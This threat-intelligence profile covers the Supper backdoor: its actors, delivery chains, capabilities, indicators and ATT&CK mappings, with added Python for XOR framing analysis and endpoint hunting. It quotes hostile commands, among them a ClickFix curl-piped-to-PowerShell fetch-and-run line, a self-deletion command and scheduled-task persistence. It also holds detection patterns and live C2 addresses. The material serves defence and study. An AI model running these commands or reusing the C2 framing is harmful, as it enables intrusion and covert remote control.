Supper
Supper is a backdoor malware family, also tracked as SocksShell and ZAPCAT, that provides remote access to compromised Windows systems and includes SOCKS5 proxy functionality. Multiple reports describe it as a pre-ransomware backdoor deployed shortly after initial access, including after GootLoader/Storm-0494 intrusions and in ClickFix/Fake CAPTCHA infection chains. It is associated with the financially motivated threat actor Vanilla Tempest (previously tracked as DEV-0832 and Vice Society). Reporting links Supper deployments to intrusions that went on to deploy INC ransomware; Vanilla Tempest operations more broadly have deployed Rhysida, BlackCat, Zeppelin, and Quantum Locker.
Observed delivery vectors include deployment following GootLoader infections (themselves obtained through SEO poisoning and compromised WordPress sites), manual execution of malicious PowerShell from ClickFix/Fake CAPTCHA lures, and delivery by the pkr_mtsi packer via malvertising and fake software download sites. In one investigated Polish incident, two DLLs assessed as Supper were found under a user's AppData\Local directory, both exporting DllRegisterServer: 245282244.dll (SHA-256 2528df60e55f210a6396dd7740d76afe30d5e9e8684a5b8a02a63bdcb5041bfc) and 760468301.dll (SHA-256 21b953dc06933a69bcb2e0ea2839b47288fc8f577e183c95a13fc3905061b4e6).
Documented capabilities include remote control of the infected host, SOCKS5 proxy setup and teardown, shell command execution, self-deletion, and use of the host as a proxy to map the internal network and support lateral movement and data exfiltration. One analyzed sample established persistence through a scheduled task named GoogleUpdateTask, created with schtasks.exe and a minute-based (/SC MINUTE) trigger. The command-and-control protocol is described as custom-encrypted and structured, with multiple buffers and a fixed format used to parse commands; one report states that outbound messages are XOR-encoded with a new 4-byte key per message header. Additional tradecraft attributed to observed variants includes API hammering, API hashing, runtime shellcode construction and reconstruction, hash-based DLL resolution, custom LZMA decompression, and custom encryption. API hammering in particular is a sandbox-evasion technique (burning time in large volumes of benign API calls), so short automated detonations may not reach the C2 stage.
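The per-message XOR scheme described above is worth modelling to see what it does and does not buy the operator. The following is an added example, not Supper's own code: the page only says each outbound message uses a fresh 4-byte XOR key carried per message header, so the wire layout assumed here (4-byte key followed by the body XORed with that key, repeating) is an assumption, and the plaintext is constructed. It shows that a fresh key per message leaves no stable bytes for a network byte-signature, while a 4-byte XOR is still recoverable from four bytes of predictable plaintext.

```python
"""Per-message 4-byte XOR framing of the kind reported for Supper's outbound C2.

Added example, not Supper's actual code. ASSUMED wire layout:
    key(4 bytes) || plaintext XOR key (key repeating)
The plaintexts used below are constructed, not real Supper commands.
"""
import random
from typing import Optional


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def frame(plaintext: bytes, key: Optional[bytes] = None,
          rng: Optional[random.Random] = None) -> bytes:
    """Encoder side: pick a fresh 4-byte key unless one is supplied,
    prepend it, and XOR the body with it."""
    if key is None:
        rng = rng or random.SystemRandom()
        key = bytes(rng.getrandbits(8) for _ in range(4))
    if len(key) != 4:
        raise ValueError("key must be exactly 4 bytes")
    return key + xor_bytes(plaintext, key)


def unframe(wire: bytes) -> bytes:
    """Decoder side: read the key from the header and undo the XOR."""
    if len(wire) < 4:
        raise ValueError("truncated frame")
    return xor_bytes(wire[4:], wire[:4])


def recover_key(cipher_body: bytes, known_prefix: bytes) -> bytes:
    """Known-plaintext attack: if the first four plaintext bytes are
    predictable (a fixed command tag, for instance), the key is simply
    ciphertext XOR plaintext over those four bytes, even when the header
    carrying the key has been stripped or is not understood."""
    if len(known_prefix) < 4 or len(cipher_body) < 4:
        raise ValueError("need at least 4 bytes of each")
    return xor_bytes(cipher_body[:4], known_prefix[:4])


def stable_byte_fraction(plaintext: bytes, trials: int = 20, seed: int = 0) -> float:
    """Fraction of body positions holding the same byte across `trials`
    independent framings of the same plaintext, i.e. what a static byte
    signature on the wire would have to rely on. Seeded for repeatability."""
    rng = random.Random(seed)
    bodies = [frame(plaintext, rng=rng)[4:] for _ in range(trials)]
    stable = sum(1 for pos in range(len(plaintext))
                 if len({body[pos] for body in bodies}) == 1)
    return stable / len(plaintext)


if __name__ == "__main__":
    msg = b"CMD:systeminfo"  # constructed plaintext, not a real Supper command
    wire = frame(msg, key=b"\xde\xad\xbe\xef")
    print("wire     :", wire.hex())
    print("decoded  :", unframe(wire))
    print("key found:", recover_key(wire[4:], b"CMD:").hex())
    print("stable   :", stable_byte_fraction(msg))
```

The practical consequence for detection is that content signatures on the encrypted body are unlikely to hold across messages; the reliable network indicators are the endpoint, the port, and the framing behaviour (fixed-size header, consistent message structure), not byte patterns in the payload.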
Supper has been observed in intrusions against enterprise environments, including U.S. healthcare organizations and a large Polish organization. In the healthcare intrusions reported by Microsoft, the attackers used Supper alongside the legitimate AnyDesk remote-access and MEGA file-synchronization tools, moved laterally via RDP and WMI Provider Host, and then deployed INC ransomware. Huntress reporting on GootLoader-linked cases describes rapid post-compromise activity: deployment of multiple Supper instances, WinRM-based lateral movement to domain controllers, creation of new administrator accounts, and reconnaissance consistent with pre-ransomware operations.
Reported indicators include the two DLL hashes above and the hardcoded or learned C2 endpoints 162.19.199.110:4043, 146.19.49.130:8080 and 185.233.166.27:443, plus 85.239.54.130 (reported without a port). Treat the IP:port pairs as point-in-time infrastructure rather than durable identifiers: the sample's support for C2 server list updates from the server means a given infection may rotate to endpoints not listed here, so behavioural indicators (the GoogleUpdateTask scheduled task, the ping-then-delete self-removal command, DllRegisterServer-exporting DLLs under a user profile) should be hunted alongside the atomic IOCs.
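The following is an added hunting example, not code from any of the reports cited on this page. It runs the behavioural and atomic indicators above (the GoogleUpdateTask schtasks persistence, the ping-then-delete self-removal string, the two DLL hashes, and the C2 endpoints) over endpoint telemetry. The input format (one JSON object per line with Sysmon-style field names) and every sample event are constructed for the illustration; regsvr32/rundll32 as the loader of the DllRegisterServer-exporting DLLs is this example's assumption, since the reporting only gives the export and the AppData\Local location.

```python
"""Hunt for reported Supper tradecraft in endpoint telemetry.

Added example, not code from any vendor report. Input is one JSON object per
line using Sysmon-style field names (EventID 1 = process create, 3 = network
connect, 7 = image load); the field layout and all sample events below are
constructed for this illustration.
"""
import json
import re
from typing import Dict, List

# Reported C2 endpoints. 85.239.54.130 was reported without a port, so it is
# matched on any port.
C2_ENDPOINTS = {
    ("162.19.199.110", 4043),
    ("146.19.49.130", 8080),
    ("185.233.166.27", 443),
}
C2_IPS_ANY_PORT = {"85.239.54.130"}

# SHA-256 of the two DLLs assessed as Supper in the Polish incident.
SUPPER_SHA256 = {
    "2528df60e55f210a6396dd7740d76afe30d5e9e8684a5b8a02a63bdcb5041bfc",
    "21b953dc06933a69bcb2e0ea2839b47288fc8f577e183c95a13fc3905061b4e6",
}

# Reported persistence: schtasks.exe /Create /SC MINUTE /TN GoogleUpdateTask ...
# Flags are matched independently so argument order does not matter.
RE_SCHTASKS_CREATE = re.compile(r"\bschtasks(?:\.exe)?\b.*\s/Create\b", re.I)
RE_SC_MINUTE = re.compile(r"\s/SC\s+MINUTE(?!\S)", re.I)
RE_TN_GOOGLEUPDATE = re.compile(r"\s/TN\s+GoogleUpdateTask(?!\S)", re.I)
# Reported self-deletion string: ping used as a sleep, then delete the file.
RE_SELF_DELETE = re.compile(r"\bping\s+1\.1\.1\.1\b.*&\s*del\s+/f\s+/q\b", re.I)
# ASSUMPTION: regsvr32/rundll32 loading a DLL from AppData\Local. The report
# only says the DLLs exported DllRegisterServer and lived under AppData\Local.
RE_APPDATA_DLL = re.compile(r"\\AppData\\Local\\[^\"'\s]+\.dll\b", re.I)
LOADERS = ("\\regsvr32.exe", "\\rundll32.exe")
RE_SHA256 = re.compile(r"SHA256=([0-9a-f]{64})", re.I)

# Constructed sample telemetry: four malicious and three benign events.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\schtasks.exe", "CommandLine": "schtasks.exe /Create /SC MINUTE /TN GoogleUpdateTask /TR C:\\Users\\bob\\AppData\\Local\\payload.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /C ping 1.1.1.1 -n 5 & Del /f /q \"C:\\Users\\bob\\AppData\\Local\\stage.exe\""}
{"EventID": 1, "Image": "C:\\Windows\\System32\\regsvr32.exe", "CommandLine": "regsvr32.exe /s C:\\Users\\bob\\AppData\\Local\\245282244.dll"}
{"EventID": 7, "Image": "C:\\Windows\\System32\\regsvr32.exe", "ImageLoaded": "C:\\Users\\bob\\AppData\\Local\\245282244.dll", "Hashes": "SHA256=2528DF60E55F210A6396DD7740D76AFE30D5E9E8684A5B8A02A63BDCB5041BFC"}
{"EventID": 3, "Image": "C:\\Windows\\System32\\regsvr32.exe", "DestinationIp": "162.19.199.110", "DestinationPort": 4043}
{"EventID": 3, "Image": "C:\\Windows\\System32\\regsvr32.exe", "DestinationIp": "85.239.54.130", "DestinationPort": 8443}
{"EventID": 1, "Image": "C:\\Windows\\System32\\schtasks.exe", "CommandLine": "schtasks.exe /Create /SC DAILY /TN NightlyBackup /TR C:\\Tools\\backup.exe"}
{"EventID": 3, "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "DestinationIp": "162.19.199.110", "DestinationPort": 443}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c ipconfig /all"}
"""


def hunt(jsonl: str) -> List[Dict]:
    """Return one {rule, event} record per indicator match."""
    hits: List[Dict] = []
    for line in jsonl.strip().splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        cmd = ev.get("CommandLine", "")
        image = ev.get("Image", "").lower()
        if ev.get("EventID") == 1:
            if (RE_SCHTASKS_CREATE.search(cmd) and RE_SC_MINUTE.search(cmd)
                    and RE_TN_GOOGLEUPDATE.search(cmd)):
                hits.append({"rule": "supper_schtasks_googleupdatetask", "event": ev})
            if RE_SELF_DELETE.search(cmd):
                hits.append({"rule": "supper_self_delete_cmd", "event": ev})
            if image.endswith(LOADERS) and RE_APPDATA_DLL.search(cmd):
                hits.append({"rule": "appdata_dll_register_heuristic", "event": ev})
        elif ev.get("EventID") == 3:
            dst = (ev.get("DestinationIp", ""), int(ev.get("DestinationPort", 0)))
            if dst in C2_ENDPOINTS or dst[0] in C2_IPS_ANY_PORT:
                hits.append({"rule": "supper_c2_endpoint", "event": ev})
        m = RE_SHA256.search(ev.get("Hashes", ""))
        if m and m.group(1).lower() in SUPPER_SHA256:
            hits.append({"rule": "supper_known_sha256", "event": ev})
    return hits


def summarize(hits: List[Dict]) -> Dict[str, int]:
    """Count matches per rule."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h["rule"]] = counts.get(h["rule"], 0) + 1
    return counts


if __name__ == "__main__":
    for h in hunt(SAMPLE_EVENTS):
        print(h["rule"], "<-", h["event"].get("CommandLine") or h["event"].get("ImageLoaded")
              or f'{h["event"].get("DestinationIp")}:{h["event"].get("DestinationPort")}')
```

Two design choices are deliberate. Endpoints reported with a port are matched as IP:port pairs, so the benign-looking browser connection to 162.19.199.110:443 in the sample is not flagged; if you prefer to alert on the IP alone, move it into C2_IPS_ANY_PORT and accept the extra triage. The generic reconnaissance commands the reporting lists (systeminfo, ipconfig /all) are intentionally not rules on their own; they only become interesting in proximity to one of the Supper-specific matches.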
Groups observed using it
3 distinct threat actors attributed by public researchers; the attributing statements are quoted below.
Once inside, the attackers backdoored the systems with Supper malware and deployed the legitimate AnyDesk remote monitoring and MEGA data synchronization tools.
Storm-0494 deploys backdoors like Supper (SocksShell or ZAPCAT) and AnyDesk for remote access, further compromising networks.
X-Force links the group to malware developers/operators such as Broomstick, Supper, PortStarter, SystemBC, and Rhysida ransomware...
Techniques & procedures
10 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
4 techniques
"As a persistence mechanism, the sample added itself as a Windows scheduled task: schtasks.exe /Create /SC MINUTE /TN GoogleUpdateTask ..."
"...copying a specific PowerShell script and executing it manually via the Windows Run dialog..."; "the initial PowerShell command retrieves a malicious payload from a remote domain"
Multiple strings: "C:\Windows\System32\cmd.exe"; commands like "/c systeminfo" and "/c ipconfig /all"; and the Supper self-deletion command cmd.exe /C ping 1.1.1.1 ... & Del /f /q "%s"
"cmd /c curl naintn.com/... | powershell" ... "Fake CAPTCHA (ClickFix) attack... convince the victim to copy a malicious snippet, and execute it using the Win+R shortcut."
Persistence
2 techniques
"As a persistence mechanism, the sample added itself as a Windows scheduled task: schtasks.exe /Create /SC MINUTE /TN GoogleUpdateTask ..."
Privilege Escalation
2 techniques
"As a persistence mechanism, the sample added itself as a Windows scheduled task: schtasks.exe /Create /SC MINUTE /TN GoogleUpdateTask ..."
Defense Evasion
1 technique
"sample was obfuscated using an unidentified obfuscator"; "implement string decryption routines"; "packed with the same packer"; "custom algorithm" encrypting C2 data
Command and Control
4 techniques
"The ability to proxy traffic through the infected machine allows threat actors to map the internal network stealthily"
"Other supported commands include, at minimum, a SOCKS proxy feature"; YARA strings include "bad socks5 request" and "Starting Init SOCKS"
"cmd /c curl naintn.com/... | powershell"
Storm-0494 deploys backdoors like Supper (SocksShell or ZAPCAT) and AnyDesk for remote access, further compromising networks.
Recent activity
11 sources tracked across advisories, community write-ups, and news.
Referenced as a secondary payload family used post-compromise; associated with C2 infrastructure and described as supporting data exfiltration/lateral movement and potential ransomware deployment in the campaign.
Supper is a Windows malware family used for persistence and remote control. In this incident it established persistence via a scheduled task and communicated with hardcoded (and server-updated) C2 IP:port infrastructure over a custom encrypted protocol (XOR 'M' header plus a custom stream-like cipher). It supported at least C2 server list updates, a SOCKS proxy feature, and execution of custom binaries delivered from the C2, consistent with a loader/backdoor role used ahead of follow-on payloads, including ransomware.
Supper is a malware family delivered via the pkr_mtsi packer; specific functionality is not detailed in the content.